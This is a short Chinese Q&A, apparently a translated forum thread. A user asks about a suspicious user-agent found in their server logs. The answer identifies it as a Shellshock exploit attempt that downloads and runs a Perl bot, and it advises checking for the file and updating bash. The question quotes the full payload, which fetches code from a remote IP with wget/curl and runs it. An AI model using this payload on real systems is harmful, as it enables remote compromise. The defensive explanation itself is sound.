我的日誌顯示(如下所示)一個非常奇怪的用戶代理:變得非常奇怪的用戶代理日誌中
() { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx"
誰能告訴什麼是它試圖做...我認爲這是黑客行爲,以及如何可以限制對它的訪問。
這確實看起來像利用Shellshock bash bug的嘗試。 https://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited
該請求的發件人試圖讓您的機器從http://151.236.44.210/下載名爲efixx的purl腳本,然後執行它。該purl腳本是「LinuxNet perlbot」。
您應該檢查以確保您的計算機上沒有名爲「efixx」的文件,並且確保它未運行。還要確保你運行的是最新版本的bash,你應該沒問題。